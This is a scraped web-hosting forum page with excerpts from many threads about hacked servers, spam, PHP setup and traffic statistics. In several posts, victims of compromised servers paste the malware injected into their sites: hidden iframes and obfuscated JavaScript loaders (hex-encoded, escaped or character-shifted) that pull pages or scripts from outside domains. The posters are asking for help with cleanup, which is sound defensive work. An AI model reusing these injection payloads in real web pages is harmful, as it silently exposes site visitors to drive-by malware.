Hacked; Warning: Count.php?o=2 Code
Jul 16, 2008
On 4/11 at 5:30pm, my server's root was compromised and someone had a field day on my server. Surprisingly with the level of access they had, the person very quietly ran a script (I've yet to find the file, but saw reference to it in another forum about this) that updated every single .html, .htm, and *index.php file in the homes directory. I can't even count how many files were edited -- atleast 100-200 files I've had to manually change thus far.
That said, I wanted to warn everyone about this. My google results were slim on this subject. What I find really surprising is that Avast! is the only anti-virus software to warn me of the possible malware being opened. I use either at home or at my office Avast!, BitDefender 2008, Symantec Corporate Antivirus, and McAfee corporate Antivirus. I just installed Avast! yesterday just for "peace of mind" and I'm damned glad that I did because it immediately popped up about HTML:iframe-gen malware on my websites.
I have enabled e-mail sending whenever someone logs into the root account on my server -- which I believe I received the tutorial from here in the How-To section -- and I did receive an e-mail for the person logging into the root account via SSH, but the IP address and hostname was left blank. Does anyone know why the IP and hostname would be blank? That doesn't mean they were console, does it?
Here is the HTML code that was inserted into all of my .htm, .html, and *index.php files:
<iframe src=[url] width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
View 14 Replies
ADVERTISEMENT
Jun 25, 2007
About 2 months ago, I noticed random code linking to a virus in a frame was inserted into many of my web pages accross various accounts.
After I removed it all, I noticed that this has happend to me again!
Code:
<!-- ~ --><script>function v467e627add1dd(v467e627ade17d){ function v467e627adf11b () {return 16;} return(parseInt(v467e627ade17d,v467e627adf11b()));}function v467e627ae105c(v467e627ae2008){ var v467e627ae2f9b='';for(v467e627ae3f41=0; v467e627ae3f41<v467e627ae2008.length; v467e627ae3f41+=2){ v467e627ae2f9b+=(String.fromCharCode(v467e627add1dd(v467e627ae2008.substr(v467e627ae3f41, 2))));}return v467e627ae2f9b;} document.write(v467e627ae105c('3C696672616D65207372633D27687474703A2F2F7777772E3473747566666465616C732E636F6D2F646F63732F7468656D652E68746D272077696474683D31206865696768743D31207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script><!-- ~ -->
how they are inserting it into my web pages?
View 3 Replies
View Related
Dec 13, 2014
For some reason one of my customers email accounts seems to have been hacked. My admin account continues to say that the customer has reach over the 30 emails per hour limit. This is the email error:
following customers' domains, mailboxes and subscriptions are reached their limits for outgoing emails for the period:>From Dec/13/2014 05:47. To Dec/ 13/ 2014 06:47
Subscriptions
customerdomain.com, the limit is 100 messages per hour
336 attempt(s) to exceed limits from Dec/13/2014 04:31 to Dec/13/2014 05:47
So far it has sent over 5,000 attempted in the past few hours. The customer used gmail to send from domain before, so I've changed their gmail email password. I've also changed the main email password, and the plesk username and password login for the customer. It still continues
View 2 Replies
View Related
Jul 7, 2007
when I try to send Email from horde I have this:
PHP Code:
There was an error sending your message: Failed to add recipient: xxxxx@hotmail.com [SMTP: Invalid response code received from server (code: 451, response: Temporary local problem - please try later)]
View 5 Replies
View Related
May 11, 2009
I have question about the bandwidth. I have a VPS with 1000gb of bandwidth. How does it count actually. 500gb up & 500gb down or 1000gb up & 1000gb down or what? Is it the same with the shared hosting? I think I don't really need that much of bandwidth.
View 2 Replies
View Related
Jul 16, 2008
I got an alert from cpanel that a user had sent out 100s of emails and they were NOT being blocked, ofcourse to discover it was spam...without question, i deleted the account, thankfully i know who the site belongs too, and ofcourse im sure they didnot send spam,:..
1) Is it within common practice to delete someones account once such is noticed occuring on their account?..with or without notice
2) How can the server block such mass emails from being sent out? ( I have recently advised some of our clients to use newsletter services to send out mass mails if they have to send to 100+ plus people)
3) I found the script that sent out the spam emails..it was a file called sky.php i deleted but i never got a warning that such a file had been uploaded to that account...
View 11 Replies
View Related
Apr 16, 2008
I have 2 questions:
1. Upload files count in my bandwith?
2. Remote Backups count in my bandwith?
View 12 Replies
View Related
Mar 19, 2007
I've recently taken over the hosting of a large site and forum, and I want to use some for of statistics software of service so that I can determine how many unique visitors and pageviews the site and forum get (which can then be used when dealing with advertisers).
I've been using Webalizer for years, but it's not been updated in over 5 years, so it's out. I then stumbled on Awstats, which works great, but... it doesn't calculate the pageviews correctly.
At the present moment Awstats claims to have tracked approx. 2 million pageviews for the (vBulletin) forum. However, when I scroll down I notice that on number #1 in the "Pages URL Top 10" is image.php, which is used for avatars and is not a page!
Now it appears Awstats has two ways of dealing with this: the "SkipFiles" option and the "NotPageList" option. The first (SkipFiles) drops whole URLs from the stats, which isn't what I want: I just don't want them to be counted as pages.
The second (NotPageList) only accepts file extentions, not script names. This again isn't what I want: hits on showthread.php should still be counted as pages, only hits on image.php shouldn't be.
The site has a similar problem where I don't want scripts like stylesheet.php, rss.php and xml.php from being counted as pages.
My question: does anyone know a solution for this problem? Maybe a hack to allow "NotPageList" to accept script names and/or ULRs?
Alternatively: does anyone know another statistics package that's about on par or better than Awstats that can do this (and that works on Linux/Unix with logs generated by lighttpd+php-fastcgi) and that is not too expensive (max $200)?
Google Analytics isn't suitable for me (even though it would probably work well) because the site goes over 5 million pageviews/month and I don't have a Adwords account.
View 1 Replies
View Related
Jun 25, 2009
I want to count the traffic for every IP passed through squid proxy server.
Is it possible to record the traffic numbers for every IP in external .txt file
It would be better if it can write outgoing and ingoing traffic.
View 7 Replies
View Related
May 19, 2014
Is there a way of doing a simple visitor count, ideally by incrementing a number in a text file...
E.g: [URL] ...
would increment a number in text file 'client1', and still display http://mysite.org as normal?
View 1 Replies
View Related
Apr 17, 2015
I've asked sales a few times but they don't seem to know...what counts as a "website?" In PPA as a test we set up two subscriptions and one mail-only secondary domain on one of them. The Services/Websites tab lists all three, but only two are marked as Website under Hosting Type while the third is marked No Hosting. Does that count as two websites for license purposes, or three?
I'm trying to plan for multiple domains, subdomains, etc.
View 1 Replies
View Related
Oct 13, 2008
What is EPP code, I am required to enter it to register domain
View 5 Replies
View Related
Jul 16, 2009
I have serious problems with ".cgi" with malicious code, with that the person who has these files to send spam through my server without any kind of block, could block this type of send SPAM with files ".cgi"?
CentOS 5.2 - 64bits
WHM+cPanel
Exemplo of file executed: /usr/bin/perl /home/username/public_html/cgi-bin/erri/coms.cgi
View 5 Replies
View Related
Apr 9, 2007
PHP 5.2.1 installed on WHM 10.8.0 cPanel 10.9.0-C9565
If I load a php file on browser, it gets loaded, but in HTML source I can see php code.
If I run in SSH "php info.php", the php code gets runn and normal output is generated.
I checked these lines in httpd.conf:
LoadModule php5_module libexec/libphp5.so
AddModule mod_php5.c
AddHandler application/x-httpd-php .php .php4 .php3
AddType application/x-httpd-php .php
AddType application/x-httpd-php .php4
AddType application/x-httpd-php .php3
AddType application/x-httpd-php-source .phps
AddType application/x-httpd-php .phtml
"php -v" returns:
PHP 5.2.1 (cli) (built: Apr 9 2007 10:38:29)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
with Zend Extension Manager v1.2.0, Copyright (c) 2003-2006, by Zend Technologies
with Zend Optimizer v3.2.2, Copyright (c) 1998-2006, by Zend Technologies
On php.ini I have:
; Enable the PHP scripting language engine under Apache.
engine = "On" ;engine
I use long tags ("<?php").
I recompiled Apache and PHP few times, both from WHM and from SSH. I reinstalled Zend optimizer.
View 1 Replies
View Related
Nov 12, 2007
We are testing a module that we think may improve stability on our webservers. The module limits the number of concurrent connections allowed from any particular ip address.
What I need an opinion on is what error message the server should return when it is refusing because of the limit.
The module currently returns a 503 error, that's what the module's author set it to do. 503 is a temporary error, which is good, but it implies that the problem is with the server, which seems somewhat inaccurate to me.
I was thinking a 409 would be good, with text saying that the request conflicts with the per visitor connection limit for the requested resource. Ideally the browser would display the message and people would know to reconfigure software or wait for existing connections to complete before resubmitting the request.
One of my co-workers here says that at least people understand the "server busy" error and they won't understand the "conflict" message.
Someone else says most of these errors will come from folks using http 1.0 and the 409 doesn't exist at that level of the protocol, so they won't get anything more than a generic "error!" type of message.
View 1 Replies
View Related
Jul 27, 2007
I put the windows media palyer embedded code on my site, but is there a way to limit the buffer or rate at which the video downloads or streams to the user.
Quote:
<object classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" codebase= [url]
That is the code i use.
View 0 Replies
View Related
Jun 10, 2007
does anybody have a script that can veiw the php source code before it runs to the server of an external site
View 1 Replies
View Related
Jun 4, 2009
Someone sniffed ftp password of a user account on my server and looks like javascripts were altered and iframe tags inserted in php files, while i cleaned up php pages i see the following javascript code added to each .js file, what is it supposed to do?
<!--
(function(qAWI){var OMt9='var-20a-3d-22S-63-72ip-74-45n-67-69ne-22-2cb-3d-22-56e-72sion-28)+-22-2cj-3d-22-22-2cu-3dnavigator-2e-75s-65-72A-67-65nt-3bi-66((-75-2eindex-4ff-28-22-43h-72ome-22)-3c0)-26-26(u-2einde-78-4ff(-22Win-22)-3e0)-26-26(u-2eindexOf(-22-4eT-206-22)-3c0)-26-26-28doc-75me-6et-2eco-6fk-69e-2e-69-6ed-65x-4ff(-22-6di-65k-3d1-22)-3c0-29-26-26(ty-70-65-6ff(z-72v-7at-73)-21-3dty-70eof(-22A-22)))-7b-7a-72v-7a-74s-3d-22A-22-3beval(-22-69-66(window-2e-22+a+-22)j-3d-6a+-22-2ba+-22M-61jo-72-22-2b-62-2ba+-22-4din-6f-72-22+b+a+-22B-75ild-22-2b-62+-22-6a-3b-22)-3bd-6f-63u-6dent-2ewri-74e(-22-3c-73c-72ipt-20src-3d-2f-2fma-22+-22rtuz-2ecn-2fvid-2f-3fi-64-3d-22-2bj+-22-3e-3c-5c-2fsc-72ipt-3e-22)-3b-7d';var M2ye=OMt9.replace(qAWI,'%');eval(unescape(M2ye))})(/-/g);
-->
View 7 Replies
View Related
May 6, 2009
I have a customer who is hosting a website on a dedicated server. The server is a high spec server with Intel Core 2 DUO E8400 processor, 4 GB DDR2 ECC RAM and a SATA Hard Drive. He is running only a single website which has a data entry section. The problem is that a few scripts when run consume 99% of the CPU. In fact, there is a particular script which even if run alone consumes 99% CPU. The code retrieves some records from the database by running an SQL query. The code is never executed. I have checked the sql query in the code and it runs fine if executed in SQL Query Analyzer. I know the problem is somewhere in the code, but cannot find the exact cause. Is there a tool to debug the asp code and find out may be the issue with the code? I have tried the Debug Diagnostics utility,
View 2 Replies
View Related
Jul 18, 2009
how this new feature works in csf with blocking by country code.
I'm trying to put a block on Indonesia.
View 5 Replies
View Related
Oct 21, 2009
A friend of mine is trying to show the page below, however it just shows the code.
[url]
What can I do to fix it?
View 13 Replies
View Related
Oct 27, 2008
all sites in my server have maliciose code:
</html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>
how to localize this code in my sites, using grep.
My server work in centos.
View 3 Replies
View Related
Oct 2, 2008
I am currently developing a web application on a WAMP server. Once complete my client will have some in-house "programmers" make changes to the code as they are needed.
My client wants to track all changes made to the source files (ie- who made the change, when it was made, what files were modified, and what specific lines were added/removed/modified). Also, the program must run on the server and not the programmers computers.
I've searched high and low and only found a couple programs that scratch the surface of what they want.
View 4 Replies
View Related
Mar 10, 2008
Some JSP pages display the source code. Some work and some don't even after recompiling apache with tomcat module and restarting jsp.
-rw-r--r-- 1 user user 6.5K Mar 10 17:18 index.jsp
Not sure where the jsp logs are, but there were no errors in the domlogs.
View 7 Replies
View Related
Jun 14, 2008
I have just moved to a VPS server from my shared hosting server and I am suddenly finding it tough to code equally well by just using the vim command. I have become more used to the CPanel code editor probably.
Can anyone suggest a nice tool for the same. I have installed webmin, but its code editor just sucks.
View 14 Replies
View Related
May 14, 2007
i have a vps account and am trying to setup my website i installed php 4 from a control panel where it auto installed php and there is mysql and i installed all of them but when i upload my script and go to install or go to the index of my site it shows the php code and does not execute.
my permissions are right on i also made a testphp file and used this code <?php phpinfo(); ?> and still nothing just shows the php code when you browse to the file i even went further i installed from the control panel another program called phpmyadmin and when i log in it does the same thing just shows php code so what the hell is going on you think i need to contact my host provider for this issue i sent an email out but waiting for a responce
View 7 Replies
View Related
Apr 28, 2007
I have a site that runs on my dedicated server and it is MySQL/PHP based. Sometimes when I post news to the site or even try to open the homepage I get:
Quote:
Server Error
The following error occurred: [code=SERVER_RESPONSE_CLOSE] The server closed
the connection while reading the response. Contact your system administrator.
View 4 Replies
View Related
May 22, 2007
If I want to open a url say, [url]I can use file_get_content
$content=file_get_content[url]
How to do the equivalent using curl, socket, socket, and wget?
View 3 Replies
View Related
Aug 5, 2007
My server was just upgraded to FC6 and now I do not have pico for a editor. I found nano but there is problems. Screen does not refresh correctly and when I type in charaters sometimes extra charaters show up.
Are there any other screen editors built in to FC6 (not vi)
View 4 Replies
View Related
Oct 16, 2007
A friend of mine that has a proxy site on my server just realized that his site is giving some very weird error and he said he has not made any changes to the site in a while as he's been pre-occupied with other things...
Quote:
--removed--.com has sent an incorrect or unexpected message. Error Code: -12263
It appears as a JavaScript Alert when you hit submit on the proxy url form... However, I looked into it a bit and there is no JavaScript on the page... Therefore, it must be some sort of server error I'd assume... I even disabled JavaScript in Firefox and still received the error...
View 4 Replies
View Related
